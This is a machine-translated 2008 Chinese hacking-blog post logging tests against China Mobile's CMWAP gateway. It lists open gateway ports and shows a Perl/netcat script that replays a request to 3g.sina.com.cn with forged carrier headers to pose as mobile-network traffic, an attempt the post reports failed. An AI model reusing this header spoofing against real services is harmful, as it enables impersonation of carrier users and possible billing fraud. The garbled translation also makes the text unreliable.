The CMWAP of the test-vulnerability warning-the black bar safety net

ID MYHACK58:62200818423
Type myhack58
Reporter 佚名
Modified 2008-03-03T00:00:00


Author: demonalex Source: demonalex the diary of a madman

1 test ARP.

The first test is the BAN of inspiration, in the CMWAP under the ARP test, but through the GPRS into the CMWAP is the PPP Protocol with the ARP in different Protocol stacks, so the ARP in GPRS connected to the CMWAP is not functioning. ! 2 test the WAP GW of defects.

Connected to the rear through the security detection tools on the WAP GW to detect, only to find TCP80 and TCP8080 HTTP PROXY and a WAP GW Protocol UDP9200 with UDP9201 currently not find the presence of any defects. The current I is connected after the Guangzhou CMWAP GW IP is 2 1 8. 2 0 4. 2 4 3. 4 2 The.

3 test whether through the CMWAP outside of the SP site for fake WAP gateway head test:

The locking of the test target is:

首先 做 个 文档 wap.txt this sample is a BAN provide, Thank you. He: the

GET /prog/wapsite/weather_new/index. php? pos=1&vt=1 HTTP/1.1 Host: 3g. sina. com. cn Accept: /, text/x-vcard, text/x-vcalendar, image/gif, image/vnd. wap. wbmp Accept-Language: zh-cn UA-OS: Windows CE (Pocket PC) - Version 5.2 UA-color: color16 UA-pixels: 240x320 UA-Voice: TRUE UA-CPU: ARM Accept-Encoding: gzip,deflate Content-length: 0 Via: WTP/1.1 (Nokia WAP Gateway 4.0/CD3/4.1.79) X-Forwarded-For: X-Source-ID: GGSNGZ05 X-Nokia-CONNECTION_MODE: TCP X-Up-Bearer-Type: GPRS X-Nokia-gateway-id: NWG/4.1/Build04 Connection: keep-alive

Note: document the last to be added two carriage return, equivalent to the HTTP communication session in"\r\n\r\n". 然后 写 个 PERL 脚本, content:

!/ bin/perl-w

$|=1; open(WAP,"<wap.txt"); @host=<WAP>; close(WAP); chomp(@host); $target=$host[1]; $target=~s/Host: //; system("nc.exe $target 8 0".'& lt;wap. txt - >result. wml'); system("notepad.exe result. wml"); exit 1;

After running it will automatically open the result. wml found:

HTTP/1.1 3 0 2 Found Date: Sun, 0 2 Mar 2 0 0 8 0 9:4 5:0 1 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Location: 1 7&vid=8 4&pos=Err403 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8 8 5 9-1

14a <! DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>3 0 2 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF=" 1 7&vid=8 4&pos=Err403">here</A>.& lt;P> <HR> <ADDRESS>Apache/1.3.37 Server at Port 8 0</ADDRESS> </BODY></HTML>


See http://3g. sina. com. cn/3g/pro/index. php? tid=2 5 4&did=8 1 7&vid= 8 4&pos=Err403, Hey, use OPERA to look at, or identified as‘you're not through the mobile Internet’, it seems that the head is independent, the estimate is SP added CMWAP GW IP address list...estimated to be...